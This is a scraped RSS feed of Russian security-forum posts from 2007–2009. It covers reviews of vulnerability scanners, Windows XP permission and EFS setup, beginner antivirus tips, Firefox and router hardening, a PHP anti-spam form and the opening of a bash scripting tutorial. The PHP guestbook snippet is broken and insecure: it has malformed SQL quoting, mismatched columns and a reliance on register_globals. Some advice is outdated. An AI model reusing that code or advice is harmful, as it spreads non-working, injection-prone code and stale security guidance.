инсталляции обоих компонентов можно было приступать к сканированию. Пользовательский интерфейс NetGuard произвел на нас приятное впечатление. Он хорошо продуман и работает как любое другое Windows-приложение, хотя и реализован на основе Java. Все его элементы, включая командные кнопки, таблицы и вкладки, функционировали правильно. <br />NetGuard завершил поверхностное сканирование нашего сервера Windows NT менее чем за 30 секунд, выявив три пробела в защите. Все они были отнесены к проблемам низкой степени риска. Сканирование среднего уровня заняло 3,5 минуты, а число обнаруженных проблем увеличилось до пяти. Четыре из них были отнесены к низкой степени риска, а одна - к высокой. При выполнении детального сканирования сервера Windows NT (выполнявшегося более четырех минут) NetGuard сообщил о тех же пяти проблемах. <br />Поверхностное сканирование сервера RedHat 5.1 потребовало 30 секунд и дало информацию о четырех слабых местах в системе защиты. Три проблемы были отнесены к низкому риску, а одна - к высокому. Сканирование среднего уровня (4 минуты) сервера RedHat 5.1 выявило уже шесть проблем: одну - высокой степени риска, одну - средней, и четыре - низкой. Углубленное сканирование сервера RedHat 5.1 заняло целых 9 минут (самое большое время во всех наших испытаниях). На этот раз обнаружилось 11 проблем в защите: две - высокой степени риска, три - средней и шесть - низкой. <br />Средства вывода отчетов в NetGuard нам понравились. В правой части экрана выводится наглядный список проблем со ссылками на рекомендации по их устранению. К этому же отчету можно обратиться и в формате HTML. </p> <p>NetGuard - самый дешевый из протестированных нами продуктов. За 199 $ вы получаете возможность сканировать 16 хост-систем, а за 2499 $ предоставляется лицензия на неограниченное сканирование. Поскольку инструмент работает практически на любой аппаратной платформе, это превосходный выбор для компаний, применяющих разные аппаратные конфигурации. <br />Нам понравился GUI-интерфейс NetGuard на базе Java, но предлагаемые данным продуктом средства сканирования следовало бы усилить. Между тем, если вам нужны защищенные серверы Macintosh, то NetGuard остается единственно доступным вариантом. </p> <p>Kane Security Analyst 4.04 </p> <p>Продукт Kane Security Analyst компании Security Dynamics Technologies входит в семейство инструментов защиты SecurSight. Kane Security Analyst может оценивать защиту автономного сервера Windows NT или, если приобрести расширенную лицензию, всего домена Windows NT. В отличие от двух других протестированных нами продуктов, Kane Security Analyst предназначен только для сканирования серверов Windows NT и Novell NetWare. Сканирования серверов Unix или машин Windows 95/98 он не выполняет. <br />Мы загрузили пакет Kane Security Analyst на своем сервере Windows NT с инсталляционного диска CD-ROM, после чего можно было приступать к работе. При первом запуске программы она выполнила поиск доменов и серверов нашей сети Windows NT. Затем на экране появилось главное окно. Пользовательский интерфейс Kane Security Analyst спроектирован удачно. Каждая из четырех кнопок в нижней части экрана выполняет один из четырех шагов по оценке защиты системы: устанавливает стандарт защиты, проверяет ее, анализирует степень риска и выводит отчет. Кроме того, предусмотрены кнопки быстрого вызова большинства функций Kane Security Analyst, таких, как оценка на соответствие стандарту защиты C2 (C2 Security Evaluation), вывод на экран карты отчета и т. д. </p> <p>ПО Kane Security Analyst не предусматривает поверхностного, среднего и углубленного сканирования, как Internet Scanner и NetGuard. Программа поставляется с одним заданным по умолчанию шаблоном сканирования, именуемым Best Default Practices. Этот шаблон сравнивает защиту вашего сервера с практикуемыми в отрасли методами защиты. Естественно, можно создать и собственный шаблон, отвечающий специальным требованиям. </p> <p>Скорость сканирования произвела на нас благоприятное впечатление. Анализ всей системы, включая тест раскрытия пароля, потребовал менее 30 секунд, после чего нам была представлена &quot;карта отчета&quot; со списком выполненных тестов и оценкой для нашего сервера. За ограничение учетных записей наш сервер Windows NT получил 85%, за длину пароля - 56%, за контроль доступа - 86%, за мониторинг системы - 42%, а за целостность и конфиденциальность данных - 50%. В целом наша система получила среднюю оценку, равную 63%, и попала в &quot;критический&quot; диапазон. <br />После завершения сканирования можно получить набор детальных отчетов (в формате Crystal Reports). Выбрав отчет (или все отчеты), его нетрудно сгенерировать, распечатать или сохранить в файле (в разных форматах), однако мы были разочарованы тем, что Kane Security Analyst не предлагает средств вывода отчетов непосредственно в формате HTML. </p> <p>Kane Security Analyst оказался самым дорогим из рассматриваемых нами продуктов: 695 $ за сервер. Поскольку он может сканировать серверы только той платформы, на которой выполняется, это достаточно высокая цена. Конечно, вряд ли это остановит компанию, которую волнует уязвимость защиты, однако не следует забывать о том, что данный продукт не сканирует хост-системы Unix. <br />В целом Kane Security Analyst можно считать превосходным инструментальным средством для сканирования серверов Windows, но в неоднородной сетевой среде он не может конкурировать с Internet Scanner 5.2. </p> <p>Как отгоняют хакеров в Microsoft </p> <p>Директор корпорации Microsoft по защите информации Говард Шмидт (Howard Schmidt) вполне удовлетворен функциональными характеристиками ПО Internet Scanner компании Internet Security Systems (ISS). После четырехмесячного периода оценки Microsoft выбрала Internet Scanner по трем причинам: из-за надежности продукта, его постоянного обновления и сильного персонала поддержки. &quot;Internet Scanner смог выявить больше уязвимых мест, чем некоторые другие оцениваемые нами продукты, - отметил Шмидт. - У этого продукта сильная поддержка, и он постоянно обновляется в соответствии с вновь обнаруживаемыми &quot;дырами&quot; в защите, а сотрудники компании всегда готовы ответить на вопросы и выявляют потенциальные проблемы раньше, чем наши собственные специалисты&quot;. <br />Технический персонал ISS продолжает работать в тесном контакте с сотрудниками Microsoft. Они общими усилиями воздвигают заслон для хакеров. На Шмидта произвели сильное впечатление и средства вывода отчетов, предлагаемые Internet Scanner: &quot;Конечно, есть хорошие инструменты, способные идентифицировать уязвимые места в системе, но возможность собрать информацию воедино и представить в осмысленной форме - одно из превосходных качеств именно этого продукта&quot;. <br />Internet Scanner был установлен на всех системах Microsoft в конца мая, хотя его тестирование завершилось еще в 1997 году. Теперь Microsoft нуждается в полном комплекте защиты и рассматривает Internet Scanner как один из основных его элементов. &quot;Для нас большую ценность представляют продукты, способные взаимодействовать с ISS. Например, крайне желательна система обнаружения нарушителей, которая могла бы выводить отчеты для этого продукта, с тем, чтобы можно было получать осмысленные выводы&quot;. <br />Internet Scanner предлагает превосходные отчеты по результатам сканирования. Они легко читаются и сразу дают четкую картину состояния защиты сервера. <br />У Kane Security Analyst необычный интерфейс администрирования и структура отчетов, но он выявил не все пробелы в защите нашего сервера Windows NT</p> mybb@mybb.ru (admin) Wed, 11 Feb 2009 20:50:03 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=164#p164 http://sliphot.bbon.ru/viewtopic.php?pid=163#p163 <p>Настройка системы безопасности Windows XP<br />11.04.2007</p> <p>Операционная система Windows XP обладает развитой системой безопасности, которая, тем не менее, нуждается в настройке. Мы надеемся, что вы понимаете, что система Windows XP должна устанавливаться на разделах NTFS, что применение файловой системы FAT32 не рекомендуется, исходя из принципов безопасности (встроенные средства безопасности просто не могут быть реализованы при условии применения FAT32). В случае применения файловой системы FAT 32 почти все утверждения данного раздела теряют для вас всякое значение. Единственный способ включить все разрешения файловой системы – преобразовать диск в формат NTFS.</p> <p>После чистой установки Windows XP предлагаемые по умолчанию параметры безопасности работают как переключатели типа «включить-выключить». Такой интерфейс носит по умолчанию название Простой общий доступ (Simple File Sharing). Такая конфигурация обладает низким уровнем безопасности, практически совпадающей со стандартной конфигурацией Windows 95/98/Me.<br />Если вас не устраивает такая конфигурация, вы можете воспользоваться всей мощью разрешений для файлов в стиле Windows 2000. Для этого откройте произвольную папку в Проводнике и выберите Сервис -&gt; Свойства папки (Tools -&gt; Folder options). Перейдите на вкладку Вид найдите в списке флажок Использовать простой общий доступ к файлам (рекомендуется) (Use File Sharing (recommended) и снимите его. <br />Когда вы выключаете простой общий доступ, в диалоговом окне свойств любой папки появляется вкладка Безопасность. Аналогично осуществляется выдача разрешений на файлы. Все разрешения хранятся в списках управления доступом (Access Control List – ACL).</p> <p>При установке и удалении разрешений руководствуйтесь следующими основными принципами:<br />1. Работайте по схеме «сверху-вниз». <br />2. Храните общие файлы данных вместе. <br />3. Работайте с группами везде, где это только возможно. <br />4. Не пользуйтесь особыми разрешениями. <br />5. Не давайте пользователям большего уровня полномочий, чем это абсолютно необходимо (принцип минимизации полномочий). </p> <p>Установка разрешения из командной строки<br />Утилита командной строки cacls.exe доступна в Windows XP Professional позволяет просматривать и изменять разрешения файлов и папок. Cacls – сокращение от Control ACLs – управление списками управления доступом.<br />Ключи командной строки утилиты cacls<br />• /T - Смена разрешений доступа к указанным файлам в текущей папке и всех подпапках <br />• /E - Изменение списка управления доступом (а не полная его замена) <br />• /C - Продолжить при возникновении ошибки «отказано в доступе» <br />• /G - пользователь:разрешение Выделение пользователю указанного разрешения. Без ключа <br />• /E - полностью заменяет текущие разрешения <br />• /R - пользователь Отменяет права доступа для текущего пользователя (используется только с ключом /E) <br />• /P - пользователь:разрешение Замена указанных разрешений пользователя <br />• /D - пользователь Запрещает пользователю доступ к объекту <br />С ключами /G и /P нужно использовать одну их перечисленных ниже букв (вместо слова разрешение):<br />• F (полный доступ) – эквивалентно установке флажка Разрешить полный доступ (Full Control) на вкладке Безопасность. <br />• C (изменить) – тождественно установке флажка Разрешить Изменить (Modify) <br />• R (чтение) – эквивалентно установке флажка Разрешить Чтение и выполнение (Read &amp; Execute) <br />• W (запись) – равнозначно установке флажка Разрешить запись (Write) </p> <p>Microsoft Windows XP позволяет предотвратить попадание конфиденциальных данных в чужие руки. Шифрующая файловая система (Encrypting File System - EFS) шифрует файлы на диске. Однако, следует иметь ввиду, что если вы утратите ключ для расшифровки, данные можно считать утерянными. Поэтому если вы решите воспользоваться преимуществанми EFS, необходимо создать учетную запись агента восстановления, резервную копию собственного сертификата и сертификата агента восстановления. Если вы предпочитаете работать с командной строкой, то можете воспользоваться программой cipher.exe.<br />Команда cipher без параметров выводит информацию о текущей папке и размещенных в ней файлах (зашифрованы они или нет). Ниже приведен список наиболее часто используемых ключей команды cipher<br />• /E - Шифрование указанных папок <br />• /D - Расшифровка указанных папок <br />• /S:папка - Операция применяется к папке и всем вложенным подпапкам (но не файлам) <br />• /A - Операция применяется к указанным файлам и файлам в указанных папках <br />• /K - Создание нового ключа шифрования для пользователя, запустившего программу. Если этот ключ задан, все остальные игнорируются <br />• /R - Создание ключа и сертификата агента восстановления файлов. Ключ и сертификат помещаются в файл .CFX, а копия сертификата в файле .CER <br />• /U - Обновление ключа шифрования пользователя или агента восстановления для всех файлов на всех локальных дисках <br />• /U /N - Вывод списка всех зашифрованных файлов на локальных дисках без каких-либо других действий <br />Устранение проблем с разрешениями<br />Агент восстановления данных<br />Агентом восстановления данных (Data Recovery Agent) назназначается обычно администратор. Для создания агента восстановления нужно сначала сохдать сертификат восстановления данных, а затем назначить одного из пользователей таким агентом.</p> <p>Чтобы создать сертификат нужно сделать следующее:<br />1. Нужно войти в систему под именем Администратор <br />2. Ввести в командной строке cipher /R: имя файла <br />3. Введите пароль для вновь создаваемых файлов <br />Файлы сертификата имеют расширение .PFX и .CER и указанное вами имя.<br />ВНИМАНИЕ! Эти файлы позволяют любому пользователю системы стать агентом восстановления. Обязательно скопируйте их на дискету и храните в защищенном месте. После копирования удалите файлы сертификата с жесткого диска.</p> <p>Для назначения агента восстановления:<br />1. Войти в систему под учетной записью, которая должна стать агентом восстановления данных <br />2. В консоли Сертификаты перейдите в раздел Сертификаты – Текущий пользователь -&gt; Личные (Current User -&gt; Personal) <br />3. Действие -&gt; Все задачи -&gt; Импорт (Actions -&gt; All Tasks -&gt; Import) для запуска мастера импорта сертификатов <br />4. Проведите импорт сертификата восстановления <br />При неправильном использования средств шифрования вы можете получить больше вреда, чем пользы.<br />Краткие рекомендации по шифрованию:<br />1. Зашифруйте все папки, в которых вы храните документы <br />2. Зашифруйте папки %Temp% и %Tmp%. Это обеспечит шифрование всех временных файлов <br />3. Всегда включайте шифрование для папок, а не для файлов. Тогда шифруются и все создаваемые в ней впоследствии файлы, что оказывается важным при работе с программами, создающими свои копии файлов при редактировании, а затем перезаписывающими копии поверх оригинала <br />4. Экспортируйте и защитите личные ключи учетной записи агента восстановления, после чего удалите их с компьютера <br />5. Экспортируйте личные сертификаты шифрования всех учетных записей <br />6. Не удаляйте сертификаты восстановления при смене политик агентов восстановления. Храните их до тех пор, пока не будете уверены, что все файлы, защищенные с учетом этих сертификатов, не будут обновлены. <br />7. При печати не создавайте временных файлов или зашифруйте папку, в которой они будут создаваться <br />8. Защитите файл подкачки. Он должен автоматически удаляться при выходе из Windows </p> <p>Конструктор шаблонов безопасности<br />Шаблоны безопасности являются обыкновенными ASCII – файлами, поэтому теоретически их можно создавать с помощью обыкновенного текстового редактора. Однако лучше воспользоваться оснасткой Security Templates консоли Microsoft Management Console (MMC). Для этого в командной строке нужно ввести mmc /a в этой консоли выбрать меню File – Add/Remove. В диалоговом окне Add Standalone Snap-in выбрать Security Templates – Add.<br />Управление оснасткой<br />Шаблоны безопасности расположены в папке %systemroot%securitytemplates. Количество встроенных шаблонов изменяется в зависимости от версии операционной системы и установленных пакетов обновлений.<br />Если раскрыть любую папку в Security Templates, то в правой панели будут показаны папки, которые соответствуют контролируемым элементам:<br />• Account Policies – управление паролями, блокировками и политиками Kerberos <br />• Local Policies – управление параметрами аудита, пользовательскими правами и настройками безопасности <br />• Event Log – управление параметрами системного журнала <br />• Restricted Groups – определение элементов различных локальных групп <br />• System Services – включение и отключение служб и присвоение права модификации системных служб <br />• Registry – назначение разрешений на изменение и просмотр разделов реестра <br />• File System – управление разрешениями NTFS для папок и файлов </p> <p>Защита подключения к Интернет<br />Для обеспечения безопасности при подключении к Интернет необходимо:<br />• Активизировать брандмауэр подключения к Интернет (Internet Connection Firewall) или установить брандмауэр третьих фирм <br />• Отключить Службу доступа к файлам и принтерам сетей Microsoft <br />Брандмауэром подключения к Интернет называется программный компонент, блокирующий нежелательный трафик.<br />• Активация Брандмауэра подключения к Интернет. <br />• Откройте Панель управления – Сетевые подключения <br />• Щелкните правой кнопкой мыши на соединении, которое вы хотите защитить и выберите из меню пункт Свойства <br />• Перейдите на вкладку Дополнительно, поставьте галочку Защитить мое подключение к Интернет </p> <p>Заключение<br />Изложенные выше рекомендации не являются исчерпывающим материалом по настройке безопасности операционной системы Windows XP Professional, однако надеюсь, они смогут помочь вам в этом нелегком процессе.</p> mybb@mybb.ru (admin) Wed, 11 Feb 2009 19:19:58 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=163#p163 http://sliphot.bbon.ru/viewtopic.php?pid=162#p162 <p>16.05.2007</p> <p>Для начала хочу сказать пару слов об операционной системе. Во многом безопасность и сохранность информации зависит от того, какая операционная система стоит на ПК. Я сейчас не буду трогать *nix системы, потому как уязвимостями обладают практически все оси. А приведенные примеры для новичков, которые сидят в Win-системах.</p> <p>Приступим, первое, что необходимо - это убедится, что на систему не проникли вредоносные программы. Для этого существует огромное множество программ для защиты от вредоносных программ, типа: вирусов, троянов, червей, dialer, ad-ware и тому подобное. Для того что бы организовать более надежную защиту, стоит задуматься об установке файервола.</p> <p>Чтобы выбрать антивирус, советую подойти к этому вопросу внимательней, стоит почитать вам об этом побольше из разных источников. Но для начала рекомендую использовать Avast! AntiVirus или Nod32. По моим неоднократным испытаниям первый лучше, потому как у него много приемуществ, о кторых поговорим позже. Обмануть можно любой антивирус, потому как существуют различные неизвестные бинарные паковщики и крипторы (программы, которые сжимают и скрывают исходный код программы, чем обычно защищают трояны и вирусы мошенники), которых очень много, и антивирусные компании до сих пор многие не знают. Поэтому многие антивирусы попросту не способны бороться с такими вирусами, так как либо их не знают, либо на них нет вакцины (метода отлова и лечения), так как они защищены неизвестными алгоритмами защиты. И прежде чем их начнут определять антивирусные программы, пройдет много времени. Поэтому необходимо учитывать этот факт и выбирать антивирус, умеющий работать с наибольшим количеством анпакеров и понимать больше крипторов. Вобщем, предлагаю вам для начала остановится на Avast! AntiVirus. На этот момент имеется его последняя версия на его официальном сайте 4.7.1001. Я не буду долго заострять на нем внимание, но лишь скажу, что у него есть все, что нужно, включая сетевой монитор для индификации атак. Вполне успешно и без лагов работает система контроля P2P-сетей, мессенджеров и оповещения через интернет и проверки почты. Так же есть Web-монитор, обеспечивающий большую надежность, благодаря которому при прогулке в интернете можно чувствовать себя спокойно.</p> <p>Так как антивируса одного мало естественно, то я вам предложу установить какой-нибудь сканер, типа a-squared Free. В его базе насчитывается 705472 вредоносных или подозрительных программ, работа которых может навредить информации на ПК или работоспособности программного обеспечения. Последняя версия 2.5.0.299. Это советуется не только новичкам, но и тем, кто считает, что надежно защищен. Предлагаю просканировать, так как вы обязательно найдете опасные куки, маловары, возможно даже малоизвестные виды червей и вирусов. Этот сигнатурный сканер позволяет с легкостью поймать известные трояны и шпионские модули.</p> <p>Далее разговор пойдет о файерволе. Тут нет однозначного предложения, так как все зависит от прямоты ваших рук. В этом только две рекомендации:<br />1) Всегда иметь на компе свежую версию файервола, потому как уязвимости находят все время и везде.<br />2) Не лениться настраивать файервол. Обычно хорошо настроенный файервол дает 75% защиты от троянов и вирусов, что тоже немаловажно.</p> <p>При использовании ICQ мессенджеров, советую использовать всегда свежий софт, который можноскачать с wwwicq.com. Еще лучше с безопасностью и функциональностью справится &amp;RQ. Некоторые возмущаются и говорят мне, что QIP очень надежен и лучше чем IRQ, но тем не менее уязвимостей в последнем нет, и они сведены к нулю, а другие клиенты продолжают распространяться в виде as is.</p> <p>Не стоит махать рукой и кричать: в гробу я видел патчи и ServiсePack2 от мелкомягких, но они действительно закрывают кучу уязвимостей, особенно если ты часто используешь стандартный софт из поставок винды. Советую не пренебрегать этим и исправно обновлять вашу систему. Ну для начала, если нет ServicePack2, то обязательно его установите.</p> <p>Чтобы настроить систему обновлений, нужно сделать следущие операции: Пуск &gt; Панель управления &gt; Центр обеспечения безопасности &gt; Автоматическое обновление и настроить все как вам удобно.</p> <p>Далее, советую аналогичным образом настроить встроенный стандартный брандмауэр.<br />Пуск &gt; Панель управления &gt; Центр обеспечения безопасности &gt; Брандмауэр Windows<br />По-крайней мере, я не нашел ни одного эксплоита, кторый пробивал бы его на прямую, поэтому не побрезгуйте и установите его.</p> <p>Что же касается кражи данных и получения полного доступа к ПК, в этом вы виноваты сами, так как не стоит запускать, устанавливать, скачивать программы сомнительного содержания. И не рекомендуется посещать порно сайты, так как там часто впаривают трояны. Ничего удивительно если окажется, что после перезагрузки или выключения, винда не будет грузиться. Не рекомендую так же посещать крек сайты, это зло. Почему? да потому, что 50% всех креков напичканы троями разных модификаций.</p> <p>И еще, при установке не ставьте слишком легкие пароли, типа: Vasya и тому подобные, так как для хакеров это самый простой способ получить доступ к вашей информации. Не ставьте пароли состоящие из даты вашего рождения, имени, фамилии и прочего. Не совершайте всех этих ламерских глупостей. Советую ставить пароли, состоящие из латинских строчных, заглавных букв и цифр, типа: JKH89ukj2390ujI (рекомендуем использовать генератор паролей)</p> <p>На этом все. Эта статья была предназначена по большей мере для новичков, так что не судите строго. Помните, не доверяйте кому попало, иначе рискуете потерять данные, цена которых может достигать 10000$. Будьте бдительны и не попадайтесь на уловки кидал и фишеров. Искренне ваш независимый специалист в сфере безопасности JackMX aka СrovaVIY</p> <p>Все права принадлежат :: &#950; Attack-on-web.com &#950; :: Форум по информационной безопасности ::</p> mybb@mybb.ru (admin) Tue, 10 Feb 2009 19:02:24 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=162#p162 http://sliphot.bbon.ru/viewtopic.php?pid=161#p161 <p>02.09.2008</p> <p>Это руководство по настройкам безопасности броузера Firefox защищающим от атак MITM, IFRAME, SSL и других </p> <p>These configurations can be applied to Iceweasel and Linux as well.</p> <p>Just replace Tools &gt; Options with Edit &gt; Preferences</p> <p>Firefox Security Config 2008</p> <p>Tools &gt; Options &gt; Content &gt; Check Block pop-up windows</p> <p>Tools &gt; Options &gt; Privacy &gt; History &gt; Uncheck:</p> <p>Remember visited pages for the last 0 days<br />Remember what I enter in forms and the search bar<br />Remember what i've downloaded </p> <p>Tools &gt; Options &gt; Privacy &gt; Cookies </p> <p>Check Accept cookies from sites <br />Keep until: I close Firefox <br />&#160; <br />You can add another layer of security by using Spyware Blaster. </p> <p>Tools &gt; Options &gt; Privacy &gt; Private Data</p> <p>Check Always clear my private data when I close Firefox<br />Settings button: Everything should be checked in this window. </p> <p>Tools &gt; Options &gt; Security &gt; Check</p> <p>Warn me when site try to install add-ons<br />Tell me if the site I am visiting is a suspected forgery </p> <p>Tools &gt; Options &gt; Security &gt; Passwords &gt; Uncheck</p> <p>Remember passwords for sites<br />Use a master password </p> <p>Tools &gt; Options &gt; Advanced &gt; Network &gt; Cache</p> <p>Press Clear Now Button<br />Set to Use up to 0 MB of space for the cache </p> <p>Type about:config in the url bar.</p> <p>Edit these settings to display:</p> <p>browser.cache.disk.capacity 0<br />browser.cache.disk.enable false<br />browser.cache.disk_cache_ssl false<br />browser.cache.memory.enable false</p> <p>network.cookie.enableForCurrentSessionOnly true<br />network.cookie.lifetime.days 0<br />network.cookie.lifetimePolicy 0<br /></p> <p>Manage Search Engines</p> <p>Access this window from the search engine window.<br />Uncheck Show search suggestions. <br /></p> <p>Firefox security Add-ons</p> <p>NoScript<br /><a href="https://addons.mozilla.org/en-US/firefox/addon/722" rel="nofollow" target="_blank">https://addons.mozilla.org/en-US/firefox/addon/722</a></p> <p>Firekeeper<br /><a href="http://firekeeper.mozdev.org/" rel="nofollow" target="_blank">http://firekeeper.mozdev.org/</a></p> <p>Perspectives<br /><a href="http://www.cs.cmu.edu/~perspectives/index.html" rel="nofollow" target="_blank">http://www.cs.cmu.edu/~perspectives/index.html</a></p> <p>Cert Viewer Plus<br /><a href="https://addons.mozilla.org/en-US/firefox/addon/1964" rel="nofollow" target="_blank">https://addons.mozilla.org/en-US/firefox/addon/1964</a></p> <p>ShowIP<br /><a href="https://addons.mozilla.org/en-US/firefox/addon/590" rel="nofollow" target="_blank">https://addons.mozilla.org/en-US/firefox/addon/590</a></p> <p>Netcraft Toolbar<br /><a href="https://addons.mozilla.org/en-US/firefox/addon/1326" rel="nofollow" target="_blank">https://addons.mozilla.org/en-US/firefox/addon/1326</a></p> <p>Cookie Monster<br /><a href="https://addons.mozilla.org/en-US/firefox/addon/4703" rel="nofollow" target="_blank">https://addons.mozilla.org/en-US/firefox/addon/4703</a></p> <p>Remove Cookie(s) for Site<br /><a href="https://addons.mozilla.org/en-US/firefox/addon/1595" rel="nofollow" target="_blank">https://addons.mozilla.org/en-US/firefox/addon/1595</a></p> mybb@mybb.ru (admin) Tue, 10 Feb 2009 18:36:18 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=161#p161 http://sliphot.bbon.ru/viewtopic.php?pid=160#p160 <p>09.09.2008</p> <p>© 2008 Денис Забияко. </p> <p>Все очень просто. Вы бы хотели иметь защищенный доступ в Интернет дома? Нет ничего проще. Надо иметь выделенку, ставим маршрутизатор (роутер) дома подойдет модель DL-604 он дешевый 87 грн. В нем есть все нужные нам функции. Необходимо пройти Wizard. Подключаем шнурок от роутера в порт ПК, а шнурок от модема в гнездо 1 роутера. </p> <p>Во вкладочке advanced включить такие параметры (посмотреть, чтобы были правила): <br />Action Name Source Destination Protocol <br />Allow Ping WAN port WAN,* WAN,* ICMP,* <br />Deny Default *,* LAN,* *,* <br />Allow Default LAN,* *,* *,* </p> <p>Затем во вкладочке Tools -&gt; Misc </p> <p>1. Выключить <br />Allows VPN connections to work through the DI-604 (если не нужен VPN). <br />PPTP Disabled <br />IPSec Disabled </p> <p>Block WAN Ping <br />When you &quot;Block WAN Ping&quot;, you are causing the public WAN IP address on the DI-604 to not respond to ping commands. Pinging public WAN IP addresses is a common method used by hackers to test whether your WAN IP address is valid. </p> <p>Discard PING from WAN side Disabled </p> <p>Эта опция включает PING, без нее у меня провайдер не работает, не дает нормально IP. <br />Если ваш провайдер работает с включенной опцией ВКЛЮЧИТЕ ее. </p> <p>XBOX Support <br />You can setup this item if you want to enable XBOX Support </p> <p>Disabled </p> <p>UPnP Setting <br />You can disable or enable UPnP functions at anytime. <br />Disabled </p> <p>2. Включить </p> <p>DoS protection <br />You can setup this item if you want to enable DoS protection. </p> <p>Enabled </p> <p>SPI mode <br />You can setup this item if you want to enable SPI mode. </p> <p>Enabled </p> <p>Все!</p> mybb@mybb.ru (admin) Tue, 10 Feb 2009 18:32:35 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=160#p160 http://sliphot.bbon.ru/viewtopic.php?pid=159#p159 <p>10.03.2007</p> <p>Изрядно устав бороться со спамерами , раз в минуту гадившими в мои форумы (формы обратной связи и т.п.), решил, что бороться с ними, используя картинку с кодом дело неблагодарное, ибо спамерам пофиг, а уважаемым посетителям моих сайтов принесет огромные неудобства. Было придумано следующее решение (вполне вероятно, что я не первый такой умный, но конкретных реализаций не видел)</p> <p>Пример защищенной от спама формы</p> <p>gb.php <br />&lt;?php</p> <p>$main_cv=&quot;nospamcode&quot;;<br />$mysqlserver='localhost';<br />$mysqluser='xxx';<br />$mysqlpass='xxx';<br />$mysqldbname='mydb';</p> <p>$name=htmlspecialchars($name);<br />$email=htmlspecialchars($email);<br />$msg=htmlspecialchars($msg); </p> <p>if ($btn) {<br /> if ($main_cv==$cv) {<br />&#160; &#160;$ip=GetEnv('REMOTE_ADDR');<br />&#160; &#160;mysql_connect(&quot;$mysqlserver&quot;,$mysqluser,$mysqlpass) or die (&quot;Connection Error. Please try again in few minutes&quot;);<br />&#160; &#160;mysql_select_db($mysqldbname);<br />&#160; &#160;$stmt=&quot;insert into GB (DT,IP,NAME,EMAIL,MSG_TEXT) values (now(),&quot;$ip&quot;,&quot;$msg&quot;)&quot;;<br />&#160; &#160;$result=mysql_query($stmt);<br />&#160; &#160;echo 'Спасибо. Ваш отзыв принят';<br />&#160; &#160;return;<br />&#160; } <br />}</p> <p>?&gt;</p> <p>&lt;form action=&quot;gb.php&quot; name=&quot;msg_form&quot;&gt;<br />&lt;b&gt;Оставить отзыв&lt;/b&gt;<br />Ваше имя:&#160; &lt;input name=&quot;name&quot; size=30 value=&quot;&lt;? echo $name; ?&gt;&quot;&gt;&lt;br&gt;<br />Ваш e-mail: &lt;input name=&quot;email&quot; size=30 value=&quot;&lt;? echo $email; ?&gt;&quot;&gt;&lt;br&gt;<br />Текст сообщения<br />&lt;textarea name=msg id=msg rows=10 cols=50&gt;&lt;? echo $msg; ?&gt;&lt;/textarea&gt;&lt;br&gt;<br />&lt;input name=btn type=&quot;submit&quot; value=&quot; Отправить &quot;&gt;<br />&lt;input id=&quot;cv&quot; name=cv type=hidden value=&quot;null&quot;&gt;<br />&lt;/form&gt;<br />&lt;script&gt;<br />m=document.getElementById(&quot;cv&quot;);<br />m.value=&quot;&lt;? echo $main_cv; ?&gt;&quot;;<br />&lt;/script&gt;</p> mybb@mybb.ru (admin) Tue, 10 Feb 2009 17:57:26 +0300 http://sliphot.bbon.ru/viewtopic.php?pid=159#p159 http://sliphot.bbon.ru/viewtopic.php?pid=158#p158 <p>09.04.2007</p> <p>Любой начинающий системный администратор Linux рано или поздно сталкивается с таким понятием, как “скрипт”, будь то один из загрузочных скриптов вроде /etc/rc.d/rc или написанный разработчиком ПО скрипт конфигурирования configure. В данной статье я постараюсь показать, что написание скриптов на shell не является чем-то из ряда вон выходящим и вполне под силу даже новичку в мире Linux.</p> <p>Начнем с того, что разберем, что же скрывается за английскими терминами shell и скрипт. Shell, или оболочка, как этот термин иногда переводят – это командный интерпретатор, интерфейс между пользователем и операционной системой, ее ядром. Но, кроме этого, это еще и мощный язык программирования и написания сценариев. Он содержит свои служебные слова и управляющие конструкции и позволяет писать на нем программы. Такая программа на языке сценариев, называемая скриптом, может объединять в себе системные вызовы и команды операционной системы, а также внешние утилиты, создавая мощный инструмент для системного администрирования.</p> <p>Одной из задач системного администрирования является резервное копирование важной информации. Поэтому давайте рассмотрим пример скрипта, реализующего back-up информации.</p> <p>Начало начал.</p> <p>Итак, прежде всего, нам необходимо разобраться в структуре скрипта. Она не представляет собой ничего сложного. По большому счету, простейший скрипт – просто перечисление системных команд. Например:</p> <p>echo This is just example<br />whoami <br />uname -a</p> <p>Эти команды объединены в одном файле. Но shell должен знать, что он должен этот файл обработать, а не просто прочесть его содержимое. Для этого служит специальная конструкция: #!</p> <p>Эта конструкция называется «sha-bang». Вообще-то, # задает комментарий, но в данном случает sha-bang означает, что после нее пойдет путь к обработчику скрипта. Напрмер:</p> <p>#!/bin/bash<br />#!/bin/sh<br />#!/usr/bin/perl</p> <p>Мы остановимся на Bash, Bourne-Again shell. Это shell устанавливается по умолчанию практически во всех Linux-системах, и /bin/sh ссылается на него. Об окончании скрипта говорит служебное слово exit.</p> <p>Вооружившись этими знаниями, напишем наш первый скрипт:</p> <p>#!/bin/bash<br />echo Простой скрипт # Команда echo выводит сообщение на экран<br />echo Вы:<br />whoami # whoami показывает имя зарегистрированного пользователя<br />echo Ваша система стартовала<br />uptime # uptime показывает время включения машины<br />echo Сегодня<br />date # date показывает текущую дату и время<br />echo Пока все<br />exit</p> <p>Сохраним этот файл под именем tutor1.sh. Выполним команду chmod +rx tutor1.sh чтобы сделать скрипт исполняемым.</p> <p>Результатом выполнения скрипта будет:</p> <p>voland@superstar:~/Doc/Open Source$ ./tutor1.sh<br />Простой скрипт<br />Вы:<br />voland<br />Ваша система стартовала<br />14:38:46 up 1:48, 2 users, load average: 0.47, 0.43, 0.41<br />Сегодня<br />Вск Фев 26 14:38:46 MSK 2006<br />Пока все</p> <p>Переходим к более серьезному.</p> <p>Теперь, когда мы научились писать простейшие скрипты, самое время перейти к серьезным вещам: написанию скрипта для резервного копирования. </p> <p>Перво-наперво, необходимо определить – резервную копию чего мы будем делать. Поэтому наш скрипт должен уметь работать с командной строкой. Аргументы командной строки задаются после имени скрипта через пробел: somescript arg1 arg2 arg3. Скрипт воспринимает аргументы по номерам их следования, поэтому мы будем использовать конструкции вида $номер_аргумента, т.е. $1, $2, $3. $ - это символ подстановки, который нам понадобится и при работе с переменными. Переменные в скрипте задаются в виде имя_переменной=значение. Мы будем использовать переменные MAXPARAMS для определения максимального количества параметров командной строки, BACKUPFILE для задания имени архива, BACKUPDIR для папки, резервную копию которой 